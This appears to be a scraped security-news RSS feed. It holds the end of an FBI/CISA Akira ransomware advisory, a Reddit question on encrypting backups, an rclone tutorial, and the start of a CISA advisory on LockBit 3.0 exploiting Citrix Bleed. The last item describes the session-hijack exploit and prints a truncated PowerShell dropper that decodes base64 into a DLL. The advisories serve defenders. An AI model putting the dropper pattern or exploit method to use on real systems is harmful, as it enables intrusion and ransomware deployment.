<li><strong>Segment networks</strong> to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#NetworkSegmentation2F" title="Network Segmentation (2.F)">CPG 2.F</a>].</li>
<li><strong>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.</strong> To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#DetectingRelevantThreatsandTTPs3A" title="Detecting Relevant Threats and TTPs (3.A)">CPG 3.A</a>].</li>
<li><strong>Filter network traffic</strong> by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents threat actors from directly connecting to remote access services that they have established for persistence.</li>
<li><strong>Install, regularly update, and enable real time detection for antivirus software</strong> on all hosts.</li>
<li><strong>Review domain controllers, servers, workstations, and active directories</strong> for new and/or unrecognized accounts [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#AssetInventory1A" title="Asset Inventory (1.A)">CPG 1.A</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#DocumentDeviceConfigurations2O" title="Document Device Configurations (2.O)">2.O</a>].</li>
<li><strong>Audit user accounts</strong> with administrative privileges and configure access controls according to the principle of least privilege [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SeparatingUserandPrivilegedAccounts2E" title="Separating User and Privileged Accounts (2.E)">CPG 2.E</a>].</li>
<li><strong>Disable unused</strong> <strong>ports</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#ProhibitConnectionofUnauthorizedDevices2V" title="Prohibit Connection of Unauthorized Devices (2.V)">CPG 2.V</a>].</li>
<li><strong>Consider adding an email banner to emails</strong> received from outside of your organization [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#EmailSecurity2M" title="Email Security (2.M)">CPG 2.M</a>].</li>
<li><strong>Disable hyperlinks</strong> in received emails.</li>
<li><strong>Implement time-based access for accounts set at the admin level and higher.</strong> For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the <a href="https://www.cisa.gov/zero-trust-maturity-model" title="Zero Trust Maturity Model">Zero Trust model</a>). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.</li>
<li><strong>Disable command-line and scripting activities and permissions.</strong> Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SeparatingUserandPrivilegedAccounts2E" title="Separating User and Privileged Accounts (2.E)">CPG 2.E</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#DisableMacrosbyDefault2N" title="Disable Macros by Default (2.N)">2.N</a>].</li>
<li><strong>Maintain offline backups of data,</strong> and regularly maintain backup and restoration [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SystemBackups2R" title="System Backups (2.R)">CPG 2.R</a>]. By instituting this practice, the organization helps ensure they will not be severely interrupted, and/or only have irretrievable data. </li>
<li><strong>Ensure all backup data is encrypted, immutable</strong> (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#StrongandAgileEncryption2K" title="Strong and Agile Encryption (2.K)">CPG 2.K</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SecureSensitiveData2L" title="Secure Sensitive Data (2.L)">2.L</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SystemBackups2R" title="System Backups (2.R)">2.R</a>].</li>
</ul>
<h3><strong>VALIDATE SECURITY CONTROLS</strong></h3>
<p>In addition to applying mitigations, the FBI, CISA, EC3, and NCSC-NL recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The FBI, CISA, EC3 and NCSC-NL recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol>
<li>Select an ATT&amp;CK technique described in this advisory (see Tables 4 -12).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol>
<p>The FBI, CISA, EC3, and NCSC-NL recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h3><strong>RESOURCES</strong></h3>
<ul>
<li><a href="https://www.stopransomware.gov/" title="#StopRansomware">Stopransomware.gov</a> is a whole-of-government approach that gives one central location for ransomware resources and alerts.</li>
<li>Resource to mitigate a ransomware attack: <a href="https://www.cisa.gov/resources-tools/resources/stopransomware-guide" title="Joint Ransomware Task Force (JRTF) #StopRansomware Guide">#StopRansomware Guide</a>.</li>
<li>No cost cyber hygiene services: <a href="https://www.cisa.gov/cyber-hygiene-services" title="Cyber Hygiene Services">Cyber Hygiene Services</a>, <a href="https://github.com/cisagov/cset/releases/tag/v10.3.0.0" title="Ransomware Readiness Assessment CSET v10.3">Ransomware Readiness Assessment</a>.</li>
</ul>
<h3><strong>REFERENCES</strong></h3>
<ol>
<li><a href="https://www.fortinet.com/blog/threat-research/ransomware-roundup-akira" title="Ransomware Roundup - Akira">Fortinet: Ransomware Roundup - Akira</a></li>
<li><a href="https://blogs.cisco.com/security/akira-ransomware-targeting-vpns-without-multi-factor-authentication" title="Akira Ransomware Targeting VPNs without Multi-Factor Authentication">Cisco: Akira Ransomware Targeting VPNs without MFA</a></li>
<li><a href="https://www.truesec.com/hub/blog/akira-ransomware-and-exploitation-of-cisco-anyconnect-vulnerability-cve-2020-3259" title="Akira Ransomware and Exploitation of Cisco Anyconnect Vulnerability CVE-2020-3259">Truesec: Indications of Akira Ransomware Group Actively Exploiting Cisco AnyConnect CVE-2020-3259</a></li>
<li><a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-akira" title="Ransomware Spotlight: Akira">TrendMicro: Akira Ransomware Spotlight</a></li>
<li><a href="https://www.crowdstrike.com/cybersecurity-101/kerberoasting/" title="KERBEROASTING ATTACKS">CrowdStrike: What is a Kerberoasting Attack?</a></li>
<li><a href="https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/" title="Akira, again: The ransomware that keeps on taking">Sophos: Akira, again: The ransomware that keeps on taking</a></li>
<li><a href="https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/" title="Akira Ransomware is “bringin’ 1988 back”">Sophos: Akira Ransomware is “bringin’ 1988 back”</a></li>
</ol>
<h3><strong>REPORTING</strong></h3>
<p>Your organization has no obligation to respond or provide information back to the FBI in response to this joint CSA. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.</p>
<p>The FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Akira threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.</p>
<p>Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.</p>
<p>The FBI, CISA, EC3, and NCSC-NL do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s <a href="https://www.ic3.gov/" title="Internet Crime Complain Center (IC3)">Internet Crime Complain Center (IC3)</a>, a local <u>FBI </u><a href="https://www.fbi.gov/contact-us/field-offices" title="Field Offices">Field Office</a>, or CISA via the agency’s <a href="https://www.cisa.gov/forms/report" title="Incident Reporting System">Incident Reporting System</a> or its 24/7 Operations Center (<a href="mailto:report@cisa.gov" title="Report to CISA">report@cisa.gov</a> or (888) 282-0870).</p>
<h3><strong>DISCLAIMER</strong></h3>
<p>The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, EC3, and NCSC-NL do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI or CISA.</p>
<h3><strong>ACKNOWLEDGEMENTS</strong></h3>
<p>Cisco and Sophos contributed to this advisory.</p>
<h3><strong>VERSION HISTORY</strong></h3>
<p>April 18, 2024: Initial version.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is your preferred way to encrypt specific files/directories for local storage or remote storage like cloud?]]></title>
<description><![CDATA[I currently have disk encryption with dm-crypt+LUKS in Linux. I am also doing backups of important directories with Restic on a cronjob and uploading these backups to a cloud service using rclone (the cloud service I am using is a paid service of IDrive e2). restic creates encrypted backups so th...]]></description>
<link>https://tsecurity.de/de/1973412/linux-tipps/what-is-your-preferred-way-to-encrypt-specific-filesdirectories-for-local-storage-or-remote-storage-like-cloud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1973412/linux-tipps/what-is-your-preferred-way-to-encrypt-specific-filesdirectories-for-local-storage-or-remote-storage-like-cloud/</guid>
<pubDate>Sun, 31 Dec 2023 15:45:38 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I currently have disk encryption with <a href="https://gitlab.com/cryptsetup/cryptsetup">dm-crypt+LUKS</a> in Linux.</p> <p>I am also doing backups of important directories with <a href="https://restic.net/">Restic</a> on a cronjob and uploading these backups to a cloud service using <a href="https://rclone.org/">rclone</a> (the cloud service I am using is a paid service of <a href="https://www.idrive.com/object-storage-e2/">IDrive e2</a>). <code>restic</code> creates encrypted backups so there's no need for any extra encryption.</p> <p>However, at times there are some standalone files or a group of such files that I need to backup or store securely in the cloud. As of now, I encrypt them using a combination of <code>tar</code> and <code>gpg</code>. Of course, I could use <code>restic</code> for this too but I rather have a utility that I can use as :</p> <pre><code>someutility --encrypt /path/to/source /path/to/target someutility --decrypt /path/to/source /path/to/target </code></pre> <p><code>gpg</code> can do this but it doesn't handle directories so youa have to combine it with <code>tar</code>. (the cloud service I am using is a paid service of </p> <p>Another option is using <code>7zip</code> with a password.</p> <p>It would also be convenient for some people to have a "vault" where the decrypted version is shown internally or through mount points but from the outside, it's encrypted. Then you can just upload these vaults as a whole to the cloud. But I am using a window manager and I have to use a standalone utility rather than the one that comes with a DE like Plasma. One example of cross-platform FOSS vault-like software is <a href="https://www.veracrypt.fr/code/VeraCrypt/">Veracrypt</a>. There's also <a href="https://github.com/rfjakob/gocryptfs">gocryptfs</a> for those who are not afraid of the terminal.</p> <p>Some of you might be self-hosting and might not need the need for encryption. But for those who store encrypted copies, what softwares/methods do you use?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/RayZ0rr_"> /u/RayZ0rr_ </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/18v93xm/what_is_your_preferred_way_to_encrypt_specific/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/18v93xm/what_is_your_preferred_way_to_encrypt_specific/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Managing Your Cloud-Based Data Storage with Rclone]]></title>
<description><![CDATA[How to optimize data transfer across multiple object storage systemsPhoto by Tom Podmore on UnsplashAs companies become more and more dependent on cloud-based storage solutions, it is imperative that they have the appropriate tools and techniques for effective management of their big data. In pre...]]></description>
<link>https://tsecurity.de/de/1938072/ai-nachrichten/managing-your-cloud-based-data-storage-with-rclone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1938072/ai-nachrichten/managing-your-cloud-based-data-storage-with-rclone/</guid>
<pubDate>Thu, 23 Nov 2023 07:37:36 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>How to optimize data transfer across multiple object storage systems</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*r3lwLRX_8QunHjFe"><figcaption>Photo by <a href="https://unsplash.com/@tompodmore86?utm_source=medium&amp;utm_medium=referral">Tom Podmore</a> on <a href="https://unsplash.com/?utm_source=medium&amp;utm_medium=referral">Unsplash</a></figcaption></figure><p>As companies become more and more dependent on cloud-based storage solutions, it is imperative that they have the appropriate tools and techniques for effective management of their <a href="https://en.wikipedia.org/wiki/Big_data">big data</a>. In previous posts (e.g., <a href="https://medium.com/towards-data-science/streaming-big-data-files-from-cloud-storage-634e54818e75">here</a> and <a href="https://towardsdatascience.com/training-from-cloud-storage-with-s5cmd-5c8fb5c06056">here</a>) we have explored several different methods for retrieving data from cloud storage and demonstrated their effectiveness at different types of tasks. We found that the most optimal tool can vary based on the specific task at hand (e.g., file format, size of data files, data access pattern) and the metrics that we wish to optimize (e.g., latency, speed, or cost). In this post, we explore yet another popular tool for cloud-based storage management — sometimes <a href="https://rclone.org/">referred to</a> as “<em>the Swiss army knife of cloud storage”</em> — the <a href="https://rclone.org/">rclone</a> command-line utility. Supporting more than <a href="https://rclone.org/#providers">70 storage service providers</a>, rclone supports similar functionality to vendor-specific storage management applications such as AWS CLI (for Amazon S3) and <a href="https://cloud.google.com/storage/docs/gsutil">gsutil</a> (for Google Storage). But does it perform well enough to constitute a viable alternative? Are there situations in which rclone would be the tool of choice? In the following sections we will demonstrate rclone’s usage, assess its performance, and <strong>highlight its value in a particular use-case — transferring data across different object storage systems</strong>.</p><h4>Disclaimers</h4><p>This post is not, by any means, intended to replace the official <a href="https://rclone.org/">rclone documentation</a>. Nor is it intended to be an endorsement of the use of rclone or any of the other tools we should mention. The best choice for your cloud-based data management will greatly depend on the details of your project and should be made following thorough, use-case specific testing. Please be sure to re-evaluate the statements we make against the most up to date tools available at the time you are reading this.</p><h3>Data Retrieval from Cloud Storage with Rclone</h3><p>The following command line uses <a href="https://rclone.org/commands/rclone_sync/">rclone sync</a> in order to sync the contents of a cloud-based object-storage path with a local directory. This example demonstrates the use of the <a href="https://rclone.org/s3/">Amazon S3</a> storage service but could just as easily have used a different cloud storage service.</p><pre>rclone sync -P \<br>            --transfers 4 \<br>            --multi-thread-streams 4 \<br>            S3store:my-bucket/my_files ./my_files </pre><p>The rclone command has dozens of <a href="https://rclone.org/docs/">flags</a> for programming its behavior. The <em>-P </em>flag outputs the progress of the data transfer including the transfer rate and overall time. In the command above we included two (of the many) controls that can impact rclone’s runtime performance: The <a href="https://rclone.org/flags/#performance"><em>transfers</em></a><em> </em>flag determines the maximum number of files to download concurrently and <a href="https://rclone.org/docs/#multi-thread-streams-n"><em>multi-thread-streams</em></a> determines the maximum number of threads to use to transfer a single file. Here we have left both at their default values (4).</p><p>Rclone’s functionality relies on the appropriate definition of the <a href="https://rclone.org/commands/rclone_config/">rclone configuration file</a>. Below we demonstrate the definition of the remote <em>S3store </em>object storage location used in the command line above.</p><pre>[S3store]<br>    type = s3<br>    provider = AWS<br>    access_key_id = &lt;id&gt;<br>    secret_access_key = &lt;key&gt;<br>    region = us-east-1</pre><p>Now that we have seen rclone in action, the question that arises is whether it provides any value over the other cloud storage management tools that are out there such as the popular <a href="https://aws.amazon.com/cli/">AWS CLI</a>. In the next two sections we will evaluate the performance of rclone compared to some of its alternatives in two scenarios that we have explored in detail in our previous posts: 1) downloading a 2 GB file and 2) downloading hundreds of 1 MB files.</p><h4>Use Case 1: Downloading a Large File</h4><p>The command line below uses the <a href="https://docs.aws.amazon.com/cli/latest/">AWS CLI</a> to download a 2 GB file from Amazon S3. This is just one of the many of methods we evaluated in <a href="https://towardsdatascience.com/streaming-big-data-files-from-cloud-storage-634e54818e75">a previous post</a>. We use the linux <em>time</em> command to measure the performance.</p><pre>time aws s3 cp s3://my-bucket/2GB.bin .</pre><p>The reported download time amounted to roughly 26 seconds (i.e., ~79 MB/s). Keep in mind that this value was calculated on our own local PC and can vary greatly from one runtime environment to another. The equivalent <a href="https://rclone.org/commands/rclone_copy/">rclone copy</a> command appears below:</p><pre>rclone sync -P S3store:my-bucket/2GB.bin .</pre><p>In our setup, we found the rclone download time to be more than two times slower than the standard AWS CLI. It is highly likely that this could be improved significantly through appropriate tuning of the rclone control flags.</p><h4>Use Case 2: Downloading a Large Number of Small Files</h4><p>In this use case we evaluate the runtime performance of downloading <em>800 </em>relatively small files of size 1 MB each. In a <a href="https://towardsdatascience.com/training-from-cloud-storage-with-s5cmd-5c8fb5c06056">previous blog post</a> we discussed this use case in the context of streaming data samples to a deep-learning training workload and demonstrated the superior performance of <a href="https://github.com/peak/s5cmd">s5cmd</a> <a href="https://github.com/peak/s5cmd#beast-mode-s5cmd"><em>beast</em></a> mode. In <em>beast</em> mode we create a file with a list of object-file operations which s5cmd performs in using <a href="https://github.com/peak/s5cmd#numworkers">multiple parallel workers</a> (256 by default). The s5cmd beast mode option is demonstrated below:</p><pre>time s5cmd --run cmds.txt</pre><p>The <em>cmds.txt </em>file contains a list of <em>800 </em>lines of the form:</p><pre>cp s3://my-bucket/small_files/&lt;i&gt;.jpg &lt;local_path&gt;/&lt;i&gt;.jpg</pre><p>The s5cmd command took an average time of 9.3 seconds (averaged over ten trials).</p><p>Rclone supports a functionality similar to s5cmd’s beast mode with the <em>files-from</em> command line option. Below we run rclone copy on our <em>800 </em>files with the <em>transfers</em> value set to <em>256</em> to match the default <a href="https://github.com/peak/s5cmd#configuring-concurrency">concurrency</a> settings of s5cmd.</p><pre>rclone -P --transfers 256 --files-from files.txt S3store:my-bucket /my-local</pre><p>The <em>files.txt</em> file contains <em>800 </em>lines of the form:</p><pre>small_files/&lt;i&gt;.jpg</pre><p>The rclone copy of our <em>800 </em>files took an average of 8.5 seconds, slightly less than s5cmd (averaged over ten trials).</p><p>We acknowledge that the results demonstrated thus far may not be enough to convince you to prefer rclone over your existing tools. In the next section we will describe a use case that highlights one of the potential advantages of rclone.</p><h3>Data Transfer Between Object Storage Systems</h3><p>These days it is not uncommon for development teams to maintain their data in more than one object store. The motivation behind this could be the need to protect against the possibility of a storage failure or the decision to use data-processing offerings from multiple cloud service providers. For example, your solution for AI development might rely on training your models in the AWS using data in Amazon S3 and running data analytics in Microsoft Azure using the same data stored in Azure Storage. Additionally, you may want to maintain a copy of your data in a local storage infrastructure such as <a href="https://www.purestorage.com/products/unstructured-data-storage/flashblade-s.html">FlashBlade</a>, <a href="https://cloudian.com/">Cloudian</a>, or <a href="https://vastdata.com/">VAST</a>. These circumstances require the ability to transfer and synchronize your data between multiple object stores in a secure, reliable, and timely fashion.</p><p>Some cloud service providers offer dedicated services for such purposes. However, these do not always address the precise needs of your project or may not enable you the level of control you desire. For example, <a href="https://cloud.google.com/storage-transfer/docs/overview">Google Storage Transfer</a> excels at speedy migration of <em>all of the data</em> within a specified storage folder, but does not (as of the time of this writing) support transferring a specific subset of files from within it.</p><p>Another option we could consider would be to apply our existing data management towards this purpose. The problem with this is that tools such as AWS CLI and s5cmd do not (as of the time of this writing) support specifying different <a href="https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-endpoints.html">access settings</a> and <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/security-creds.html">security-credentials</a> for the source and target storage systems. Thus, migrating data between storage locations requires transferring it to an intermediate (temporary) location. In the command below we combine the use of s5cmd and AWS CLI to copy a file from Amazon S3 to Google Storage via system memory and using Linux piping:</p><pre>s5cmd cat s3://my-bucket/file \<br>      | aws s3 cp --endpoint-url https://storage.googleapis.com<br>      --profile gcp - s3://gs-bucket/file</pre><p>While this is a legitimate, albeit clumsy way of transferring a <em>single</em> file, in practice, we may need the ability to transfer many millions of files. To support this, we would need to add an additional layer for spawning and managing multiple parallel workers/processors. Things could get ugly pretty quickly.</p><h4>Data Transfer with Rclone</h4><p>Contrary to tools like AWS CLI and s5cmd, rclone enables us to specify different access settings for the source and target. In the following rclone config file we add settings for Google Cloud Storage access:</p><pre>[S3store]<br>    type = s3<br>    provider = AWS<br>    access_key_id = &lt;id&gt;<br>    secret_access_key = &lt;key&gt;<br><br>[GSstore]<br>    type = google cloud storage<br>    provider = GCS<br>    access_key_id = &lt;id&gt;<br>    secret_access_key = &lt;key&gt;<br>    endpoint = https://storage.googleapis.com</pre><p>Transferring a single file between storage systems has the same format as copying it to a local directory:</p><pre>rclone copy -P S3store:my-bucket/file GSstore:gs-bucket/file</pre><p>However, the real power of rclone comes from combining this feature with the <em>files-from</em> option described above. Rather than having to orchestrate a custom solution for parallelizing the data migration, we can transfer a long list of files using a single command:</p><pre>rclone copy -P --transfers 256 --files-from files.txt \<br>            S3store:my-bucket/file GSstore:gs-bucket/file</pre><p>In practice, we can further accelerate the data migration by parsing the list of object files into smaller lists (e.g., with 10,000 files each) and running each list on a separate compute resource. While the precise impact of this kind of solution will vary from project to project, it can provide a significant boost to the speed and efficiency of your development.</p><h3>Summary</h3><p>In this post we have explored cloud-based storage management using rclone and demonstrated its application to the challenge of maintaining and synchronizing data across multiple storage systems. There are undoubtedly many alternative solutions for data transfer. But there is no questioning the convenience and elegance of the rclone-based method.</p><p>This is just one of many posts that we have written on the topic of maximizing the efficiency of cloud-based storage solutions. Be sure to check out some of <a href="https://chaimrand.medium.com/">our other posts</a> on this important topic.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=32fff991e0b3" width="1" height="1" alt=""><hr><p><a href="https://towardsdatascience.com/managing-your-cloud-based-data-storage-with-rclone-32fff991e0b3">Managing Your Cloud-Based Data Storage with Rclone</a> was originally published in <a href="https://towardsdatascience.com/">Towards Data Science</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[#StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability]]></title>
<description><![CDATA[SUMMARY
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics,...]]></description>
<link>https://tsecurity.de/de/1936097/it-security-nachrichten/stopransomware-lockbit-30-ransomware-affiliates-exploit-cve-2023-4966-citrix-bleed-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1936097/it-security-nachrichten/stopransomware-lockbit-30-ransomware-affiliates-exploit-cve-2023-4966-citrix-bleed-vulnerability/</guid>
<pubDate>Tue, 21 Nov 2023 17:37:36 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>SUMMARY</h3>
<p><strong>Note:</strong> <em>This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit </em><a href="https://www.cisa.gov/stopransomware"><em>stopransomware.gov</em></a><em> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>
<p>The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing &amp; Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances.</p>
<p>This CSA provides TTPs and IOCs obtained from FBI, ACSC, and voluntarily shared by Boeing. Boeing observed LockBit 3.0 affiliates exploiting CVE-2023-4966, to obtain initial access to Boeing Distribution Inc., its parts and distribution business that maintains a separate environment. Other trusted third parties have observed similar activity impacting their organization.</p>
<p>Historically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation. Observed TTPs for LockBit ransomware attacks can vary significantly in observed TTPs.</p>
<p>Citrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements and multifactor authentication (MFA), leading to successful session hijacking of legitimate user sessions on Citrix NetScaler web application delivery control (ADC) and Gateway appliances. Through the takeover of legitimate user sessions, malicious actors acquire elevated permissions to harvest credentials, move laterally, and access data and resources.</p>
<p>CISA and the authoring organizations strongly encourage network administrators to apply the mitigations found in this CSA, which include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the <a href="https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967">Citrix Knowledge Center</a>.</p>
<p>The authoring organizations encourage network defenders to hunt for malicious activity on their networks using the detection methods and IOCs within this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations. If no compromise is detected, organizations should immediately apply patches made publicly available.</p>
<p>Download the PDF version of this report:</p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2023-11/AA23-325A%20LockBit%203.0%20Ransomware%20Affiliates%20Exploit%20CVE%202023-4966%20Citrix%20Bleed%20Vulnerability.pdf" class="c-file__link" target="_blank">AA23-325A LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability</a>
    <span class="c-file__size">(PDF,       558.06 KB
  )</span>
  </div>
</div>
<p>For the Malware Analysis Report (MAR), see: <a href="https://www.cisa.gov/news-events/analysis-reports/ar23-325a">MAR-10478915-1.v1 Citrix Bleed</a></p>
<h3>TECHNICAL DETAILS</h3>
<p><strong>Note:</strong> <em>This advisory uses the </em><a href="https://attack.mitre.org/versions/v12/matrices/enterprise/"><em>MITRE ATT&amp;CK® for Enterprise</em></a><em> framework, version 13. See the </em><a href="https://www.cisa.gov/#_MITRE_ATT&amp;CK_Tactics"><em>MITRE ATT&amp;CK Tactics and Techniques</em></a><em> section for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s </em><a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping"><em>Best Practices for MITRE ATT&amp;CK Mapping</em></a><em> and CISA’s </em><a href="https://github.com/cisagov/Decider/"><em>Decider Tool</em></a></p>
<h4><strong>CVE-2023-4966</strong></h4>
<p>CVE-2023-4966 is a software vulnerability found in Citrix NetScaler ADC and NetScaler Gateway appliances with exploitation activity identified as early as August 2023. This vulnerability provides threat actors, including LockBit 3.0 ransomware affiliates, the capability to bypass MFA <a href="https://attack.mitre.org/versions/v14/techniques/T1556/006/">[T1556.006]</a> and hijack legitimate user sessions <a href="https://attack.mitre.org/versions/v14/techniques/T1563/">[T1563]</a>.</p>
<p>After acquiring access to valid cookies, LockBit 3.0 affiliates establish an authenticated session within the NetScaler appliance without a username, password, or access to MFA tokens <a href="https://attack.mitre.org/versions/v14/techniques/T1539/">[T1539]</a><u>.</u> Affiliates acquire this by sending an HTTP GET request with a crafted HTTP Host header, leading to a vulnerable appliance returning system memory information <a href="https://attack.mitre.org/versions/v14/techniques/T1082/">[T1082]</a>. The information obtained through this exploit contains a valid NetScaler AAA session cookie.</p>
<p>Citrix publicly disclosed CVE-2023-4966 on Oct. 10, 2023, within their <a href="https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967">Citrix Security Bulletin</a>, which issued guidance, and detailed the affected products, IOCs, and recommendations. Based on widely available public exploits and evidence of active exploitation, CISA added this vulnerability to the <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">Known Exploited Vulnerabilities (KEVs) Catalog</a>. This critical vulnerability exploit impacts the following software versions [<a href="https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967">1</a>]:</p>
<ul><li>NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50</li>
<li>NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15</li>
<li>NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19</li>
<li>NetScaler ADC and NetScaler Gateway version 12.1 (EOL)</li>
<li>NetScaler ADC 13.1FIPS before 13.1-37.163</li>
<li>NetScaler ADC 12.1-FIPS before 12.1-55.300</li>
<li>NetScaler ADC 12.1-NDcPP before 12.1-55.300</li>
</ul><p>Due to the ease of exploitation, CISA and the authoring organizations expect to see widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networks.</p>
<h4><strong>Threat Actor Activity</strong></h4>
<p>Malware identified in this campaign is generated beginning with the execution of a PowerShell script (<code>123.ps1</code>) which concatenates two base64 strings together, converts them to bytes, and writes them to the designated file path.</p>
<table class="MsoTableGrid"><tbody><tr><td>
<p>$y = "TVqQAAMA...&lt;long base64 string&gt;"</p>
<p>$x = "RyEHABFQ...&lt;long base64 string&gt;"</p>
<p>$filePath = "C:\Users\Public\adobelib.dll"</p>
<p>$fileBytes = [System.Convert]::FromBase64String($y + $x)</p>
<p>[System.IO.File]::WriteAllBytes($filePath, $fileBytes)</p>
</td>
